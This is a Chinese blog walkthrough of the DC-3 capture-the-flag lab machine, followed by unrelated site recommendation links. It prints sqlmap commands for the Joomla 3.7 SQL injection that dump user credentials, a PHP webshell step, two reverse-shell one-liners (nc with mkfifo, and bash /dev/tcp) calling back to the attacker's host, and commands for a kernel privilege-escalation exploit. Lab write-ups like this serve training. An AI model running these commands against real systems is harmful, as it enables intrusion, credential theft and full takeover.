DC-3 靶机渗透

最新推荐文章于 2022-09-14 22:06:30 发布
最新推荐文章于 2022-09-14 22:06:30 发布
阅读量517 收藏
点赞数
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44769042/article/details/120784771
版权

靶机记录--5

39772.zip 有时候github进不去

链接:https://pan.baidu.com/s/1bmE3IYQVPyaOwa09DGqE2g 
提取码:1234

目录

主机发现

端口扫描

服务版本,操作系统

web端

目录扫描

getshell1

 getshell2

上传大马

提权

提权1(失败)

提权2

 得到flag

总结

主机发现

端口扫描

就一个80

服务版本,操作系统

 

web端

主页有一个登陆点,还有密码找回功能,可进行弱口令,sql注入,万能密码,暴力破解,逻辑漏洞尝试

 试了一下貌似都不可行,然后找回密码也要邮箱的,试不了

然后它提示,只有一个flag,要获得root权限

目录扫描

找有用的

又找到一个登陆点

 

 这里有一个目录遍历漏洞

 

 

 

尝试去扫一下 Joolma 3.7 版本漏洞

刚好有一个sql注入

 

 看一下

 它里面自带了poc

sqlmap -u "http://192.168.129.206/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

扫出的数据库库名

 扫表名

sqlmap -u "http://192.168.129.206/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D "joomladb" -p list[fullordering]

 找有用的,#__users表

 扫列名

sqlmap -u "http://192.168.129.206/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --columns -T "#__users" -D "joomladb" -p list[fullordering]

 爆出用户名密码

sqlmap -u "http://192.168.129.206/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C "username,password" -T "#__users" -D "joomladb" -p list[fullordering]

 

用john 去爆一下

得到密码,试试 snoopy

登上来一个管理页面

 然后在这里找到了好像是网站的文件管理

 new  flie 一个php文件

 

 

 写入一个一句话木马

 然后想连一下,结果找不到地址。。。

然后随便点了几下,也很懵逼,出来了一个地址

 蚁剑连接成功

getshell1

在蚁剑里反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.129.129 1234 > /tmp/f

提前在kali这监听

 getshell2

直接在文件里写入反弹shell脚本,去访问

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.129.129/4567 0>&1'")?>

 

上传大马

 

 反弹shell

 

 

提权

提权1(失败)

看下内核版本,尝试使用内核提权

试试这个 .c

复制到网站根目录,开启apache

来到get的shell远程下载

编译失败 

 运行失败 

提权2

 看一下里面,他让我去下载

kali里不知道为啥下不了,直接本机浏览器下载到本地 

扔上去

 

解压编译运行

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

在切到这里面,解压

 

 编译它

 这时候运行他帮忙编译好的

提权成功

 得到flag

总结

在找到框架漏洞有很多时,多试几个,万一下一个就是呢

大马还是牛皮

关于 QueryDSL 配置和使用(详细)
平凡的人类的博客
07-15 4万+
关于 QueryDSL 最近写项目,使用到了 Jpa 这个 ORM 规范支持,使用注解的方式实现 Sql ,但是用过 Jpa 的同学都知道 Jpa 对于单表操作很灵活,但是对于复杂一些的 SQL 就是很不友好了,所以这个地方我们就用到了 QueryDSL 来实现复杂的 Sql(另外强行安利一波 Tk-MyBatis) 什么是 QueryDSL ? QueryDSL仅仅是一...
springdata-jpa-querydsl
07-21
这个名为"example-jpa-master"的压缩包文件很可能是包含了一个示例项目,该项目展示了Spring Data JPAQuerydsl的集成使用。开发者可以通过阅读源代码,了解如何配置、创建Querydsl查询,并理解它们在实际项目中的...
rsql-jpa-specification:Java库将RSQL转换为Spring Data JPA规范和QueryDSL谓词
04-08
rsql-jpa规范 将RSQL查询转换为org.springframework.data.jpa.domain.Specification或com.querydsl.core.types.Predicate和support实体关联查询。 Maven仓库 将RSQL的rsql-jpa-spring-boot-starter添加到Spring JPA转换 Maven对rsql-jpa-spring-boot-starter的依赖 < dependency> < groupId>io.github.perplexhub</ groupId> < artifactId>rsql-jpa-spring-boot-starter</ artifactId> < version>X.X.X</ version> </ dependency> 将JpaS
SpringSpring教程入门到精通
白色风车
09-14 1361
spring
Spring开发工具合集以及安装指南
a_tinyboy的博客
06-25 3205
Spring开发工具合集以及安装指南 说明:本人只是新人,recruit,工具以及安装指导来源于老师指导. 工具合集: 1.Java development kit jdk-8u144-windows-i586_8.0.1440.1.exe jdk-8u181-windows-x64.exe 2.代码处理工具 ideaIU-2018.2.2 3.服务器 apache-tomcat-7.0.94...
  AllyCAD v3.5 R12 1CD(专业CAD软件)
06-28 857
Draft Survey Pro v1.0 1CD(气流图测绘计算工具。界面友好,严格按照最新的气流测绘标准开发,美国海军系统也予以采用) DeskArtes.Design.Expert.Series.v7.0...
spring-data-jpa-2.0.9.RELEASE-API文档-中文版.zip
06-25
赠送jar包:spring-data-jpa-2.0.9.RELEASE.jar; 赠送原API文档:spring-data-jpa-2.0.9.RELEASE-javadoc.jar; 赠送源代码:spring-data-jpa-2.0.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-data-jpa...
spring-data-jpa-entity-graph:Spring Data JPA扩展允许在存储库上完全动态使用EntityGraph
05-06
没有spring-data-jpa-entity-graph的生活 仅通过注释支持EntityGraph。 因此,对于存储库方法,必须在编译之前最多选择一个EntityGraph。 这样可以避免您在考虑运行时上下文的情况下选择最佳的EntityGraph :broken_...
spring-data-jpa-guide:spring-data-jpa-guide,Spring Data JPA实现,SpringDataJpa解决方案
04-29
spring-data-jpa-guide Spring Data Jpa 实战 Spring DATA JPA 扩展阅读 Spring Data JPA 晋级提升篇:复杂场景实战用法与优化 Session与CompletableFuture的使用遇到的一些坑 SpringDataJpa之Hibernate5.0的Entity...
JPA-Specification 实现复杂查询
Be_insighted的博客
08-20 4712
1、条件查询: condition: 如果为true(默认),应用此条件查询。 property: 字段名称。 values: 具体查询的值,eq/ne/like 支持多个值。 例子: 注意:基类需继承JpaRepository、JpaSpecificationExecutor ! public interface UserEntity extends JpaRep...
Spring Data 团队于 2025 年 3 月 14 日发布了 Spring Data 2025.0.0 的第二个里程碑版本(M2)
BLOG域名:programb.blog.youkuaiyun.com
05-17 599
Spring Data 2025.0.0-M2 和 2025.1.0-M1 的发布为开发者提供了新的特性和改进,帮助他们更好地利用 Spring Data 构建现代应用程序。团队将继续收集社区反馈,并计划在 2025 年 5 月和 11 月分别发布通用版本。是 Spring Data 项目的一个重要里程碑,标志着多个 Spring Data 模块的正式发布(GA 版本)。
AllyCAD
weixin_34220834的博客
09-05 876
Magicad.Electrical.v2004.9.SR1.For.Autocad.2004.2005 Magicad.Heating.and.Piping.v2004.9.SR1.For.Autocad.2000.2002(是HVAC设计者的理想工具,内嵌碰撞检测函数, ...
SpringBoot-Spring Data Jpa - 复杂业务查询 Specification
scdncby的博客
10-11 697
SpringBoot-Spring Data Jpa - 复杂业务查询 Specification Specification 前言 应对Spring Data Jpa 复杂逻辑查询而生的条件对象 Specification 构建对象 Object泛型描述,针对业务逻辑构建的条件对象,通常与Repository层泛型一直 and 与 or 就是创建的逻辑 ‘与’、‘或’ 对象,表示构建的条件对象为逻辑 ‘与’、‘或’ 关系 Specification<Object>
JAVA常用API整理
热门推荐
郭大侠写leetcode
05-04 5万+
欢迎转载,转载请注明出处:https://blog.youkuaiyun.com/u013547284/article/details/71158100 一、JAVA常用API java.lang.Math 提供sin, cos, tan, exp, log, log10 等类方法,PI和E等类字段 java.lang.String(StringBuilder线程不安全,StringBuffer线程安...
SpringData ES中一些底层原理的分析
weixin_33895475的博客
07-06 262
之前写过一篇SpringData ES 关于字段名和索引中的列名字不一致导致的查询问题,顺便深入学习下Spring Data Elasticsearch。 Spring Data Elasticsearch是Spring Data针对Elasticsearch的实现。它跟Spring Data一样,提供了Repository接口,我们只需要定义一个新的接口并继承这个Repository接口,然后就...
Spring Data JPA - Reference Documentation
Rebirth 重生
10-14 2801
Preface Spring Data JPA provides repository support for the Java Persistence API (JPA). It eases development of applications that need to access JPA data sources. 1. Project Metadata Version cont...
SpringDataJPA笔记(3)-基于SpringBoot基础用法
yingziisme的博客
05-06 297
基于SpringBoot的基础用法 STEP1. 引入POM依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-jpa</artifactId> </dependency&gt...
关于Specification中查询条件and基础上拼接or
程序和我有一个能跑就行了
05-15 7718
exList.add(cb.or(cb.and(root.get("teacherStatus").in(TeacherStatus.ONTHEJOB, TeacherStatus.RETIREMENT, TeacherStatus.RESIGNATION)))); 控制台sql效果:and (teacher0_.teacher_status in (? , ? , ?)) ...
Python + Appium 出现Method has not yet been implemented 报错解决办法
flowerzxh的博客
03-07 3045
一、问题 如题,运行程序时遇到报错 Method has not yet been implemented 二、原因 出现此错误是因为appium sever的版本和Appium-Python-Client 的版本不一致 三、解决办法 保持版本的一致性,例如我用的sever版本1.12.1 更改Appium-Python-Client 版本为接近的,之前我用的2.1.4,现在我改成了1.2.0,问题解决 ...
Java示例代码重现wlp-spring-data-jpa-querydsl-npe错误
在提供的文件名称列表“wlp-spring-data-jpa-querydsl-npe-master”中,我们能够推断出这是该示例代码项目的名称。这可能意味着代码是按照Maven项目的结构组织的,其中包含了各种源代码文件、资源文件和可能的配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值